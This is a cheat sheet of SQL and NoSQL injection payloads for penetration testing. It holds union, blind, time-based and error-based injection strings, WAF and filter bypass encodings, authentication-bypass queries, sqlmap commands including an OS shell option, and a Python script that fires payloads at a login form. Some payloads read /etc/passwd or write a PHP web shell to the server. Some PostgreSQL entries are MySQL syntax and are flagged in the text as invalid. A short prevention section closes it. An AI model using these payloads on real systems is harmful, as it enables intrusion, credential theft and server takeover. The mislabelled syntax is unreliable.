SQL Injection Payloads
Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing.
Basic SQL Injection
Union-based Injection
-- Basic UNION
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3,4,5--
-- With column names
' UNION SELECT username,password,email FROM users--
' UNION SELECT table_name,column_name FROM information_schema.columns--
-- Multiple columns
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
Boolean-based Blind Injection
-- Basic boolean tests
' OR 1=1--
' OR '1'='1
' OR 1=1#
' OR 1=1/*
-- Conditional statements
' AND 1=1--
' AND 1=2--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5--
Time-based Blind Injection
-- MySQL
' AND SLEEP(5)--
' AND (SELECT SLEEP(5))--
' AND IF(1=1,SLEEP(5),0)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
' AND (SELECT pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '00:00:05'--
' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'--
-- Oracle
' AND (SELECT COUNT(*) FROM all_tables) > 0 AND DBMS_LOCK.SLEEP(5)--
Database-specific Payloads
MySQL
-- Version detection
' UNION SELECT @@version--
' UNION SELECT VERSION()--
-- Database enumeration
' UNION SELECT SCHEMA_NAME FROM information_schema.schemata--
' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()--
-- User enumeration
' UNION SELECT USER()--
' UNION SELECT CURRENT_USER()--
' UNION SELECT user,host FROM mysql.user--
-- File operations
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
PostgreSQL
-- Version detection
' UNION SELECT version()--
-- Database enumeration
' UNION SELECT datname FROM pg_database--
' UNION SELECT tablename FROM pg_tables--
-- User enumeration
' UNION SELECT current_user--
' UNION SELECT usename FROM pg_user--
-- File operations (note: the INTO OUTFILE line below is MySQL syntax copied from the MySQL section; it is not valid in PostgreSQL)
' UNION SELECT pg_read_file('/etc/passwd')--
' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
MSSQL
-- Version detection
' UNION SELECT @@version--
' UNION SELECT SERVERPROPERTY('productversion')--
-- Database enumeration
' UNION SELECT name FROM sys.databases--
' UNION SELECT table_name FROM information_schema.tables--
-- User enumeration
' UNION SELECT SYSTEM_USER--
' UNION SELECT USER_NAME()--
' UNION SELECT name FROM sys.server_principals--
-- File operations
' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x--
Oracle
-- Version detection
' UNION SELECT banner FROM v$version--
' UNION SELECT version FROM v$instance--
-- Database enumeration
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
-- User enumeration
' UNION SELECT user FROM dual--
' UNION SELECT username FROM all_users--
-- File operations
' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual--
Advanced Bypass Techniques
WAF Bypass
-- Comment variations
'/**/UNION/**/SELECT/**/1,2,3--
'/*!UNION*//*!SELECT*/1,2,3--
'%0AUNION%0ASELECT%0A1,2,3--
-- Case variation
' UnIoN SeLeCt 1,2,3--
' uNiOn sElEcT 1,2,3--
-- Encoding bypass
' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3--
' %55nion %53elect 1,2,3--
-- Double encoding
' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3--
Filter Bypass
-- Space replacement
'/**/UNION/**/SELECT/**/1,2,3--
'%09UNION%09SELECT%091,2,3--
'%0AUNION%0ASELECT%0A1,2,3--
'%0DUNION%0DSELECT%0D1,2,3--
'%0CUNION%0CSELECT%0C1,2,3--
'%0BUNION%0BSELECT%0B1,2,3--
-- Keyword replacement
' UNI/**/ON SEL/**/ECT 1,2,3--
' UNI%00ON SEL%00ECT 1,2,3--
' UNI%0aON SEL%0aECT 1,2,3--
Quote Bypass
-- Without quotes in the comparison (numeric 1=1, no quoted string values)
' OR 1=1--
' OR 1=1#
' OR 1=1/*
-- With different quote types
' OR "1"="1--
' OR '1'='1--
' OR `1`=`1--
-- Hex encoding
' OR 0x31=0x31--
' OR CHAR(49)=CHAR(49)--
Error-based Injection
MySQL Error-based
-- Extract database name
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
-- Extract table names
' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))--
-- Extract column names
' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))--
PostgreSQL Error-based (note: the payloads below use MySQL functions — database(), RAND(), information_schema GROUP BY — and are not valid PostgreSQL syntax)
-- Extract database name
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-- Extract table names
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
Second-order SQL Injection
User Registration
-- Username field
admin'--
admin'/*
admin'#
-- Email field
admin@test.com'--
admin@test.com'/*
admin@test.com'#
Profile Update
-- Name field
' OR 1=1--
' OR '1'='1
' OR 1=1#
-- Bio field
' UNION SELECT username,password FROM users--
' UNION SELECT 1,2,3--
NoSQL Injection
MongoDB
// Basic injection
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
// Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
// Data extraction
{"$where": "this.username.match(/.*/)"}
{"$where": "this.password.match(/.*/)"}
CouchDB
// Basic injection
{"$ne": null}
{"$gt": ""}
// Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
Automated Tools
SQLMap Commands
# Basic scan
sqlmap -u "http://target.com/page.php?id=1"
# With POST data
sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin"
# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"
# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" --tables
sqlmap -u "http://target.com/page.php?id=1" --columns -T users
sqlmap -u "http://target.com/page.php?id=1" --dump -T users
# OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
Custom Scripts
# Python SQL injection tester
import requests
import time

def test_sql_injection(url, param, payload):
    """Send ``payload`` as form field ``param`` in a single POST to ``url``
    and print which response heuristic, if any, fired.

    The three checks run in order — elapsed time above 4 s, then the
    substring "error" in the body, then the substring "success" — and only
    the first match is printed. Nothing is returned. No ``timeout`` is
    passed to ``requests.post``, so an unresponsive host blocks indefinitely.
    """
    data = {param: payload}
    start_time = time.time()
    response = requests.post(url, data=data)
    end_time = time.time()
    # 4 s threshold is tuned to the SLEEP(5) payload in the list below; any
    # slow response (network latency, server load) also trips it, so this is
    # a hint rather than confirmation.
    if end_time - start_time > 4:
        print(f"Time-based injection detected: {payload}")
    # Plain substring checks on the whole body: a page that contains the word
    # "error" or "success" for unrelated reasons matches as well.
    elif "error" in response.text.lower():
        print(f"Error-based injection detected: {payload}")
    elif "success" in response.text.lower():
        print(f"Boolean-based injection detected: {payload}")

# Test payloads (each is sent once, in order, against the "username" field)
payloads = [
    "' OR 1=1--",
    "' UNION SELECT 1,2,3--",
    "' AND SLEEP(5)--",
    "' OR '1'='1"
]
for payload in payloads:
    test_sql_injection("http://target.com/login.php", "username", payload)
Prevention and Mitigation
Parameterized Queries
# Python example
# DB-API placeholders (%s) bind username/password as values, so quote
# characters in the input can never alter the statement's structure.
# NOTE(review): comparing the password inside SQL implies the stored value
# is compared directly to the submitted one; fetch the stored hash by
# username and verify it in application code instead. Prefer an explicit
# column list over SELECT *.
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))
# PHP example
# prepare() with ? placeholders plus execute([...]) binds both values as
# parameters; the SQL string itself never contains user input.
# NOTE(review): same caveat as the Python example — the password should be
# verified against a stored hash in application code, not compared in SQL.
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);
Input Validation
# Whitelist validation
# Allowlist: only ASCII letters and digits pass; every other character
# (spaces, '_', '-', '@', quotes) is rejected. This is defense in depth —
# it complements, and does not replace, the parameterized queries above.
# Fragment: the return statements assume this runs inside a function.
allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
if not set(username).issubset(allowed_chars):
    return "Invalid username"
# Length validation
# An empty username passes both checks; add a minimum length if one is required.
if len(username) > 50:
    return "Username too long"
Testing Checklist
- Test all input fields
- Test with different HTTP methods (GET, POST, PUT, DELETE)
- Test with different content types (application/x-www-form-urlencoded, application/json)
- Test with different encodings (URL, Base64, Hex)
- Test with different quote types (single, double, backtick)
- Test with different comment styles (--, #, /* */)
- Test with different space replacements
- Test with different case variations
- Test with different encoding bypasses
- Test with different WAF bypass techniques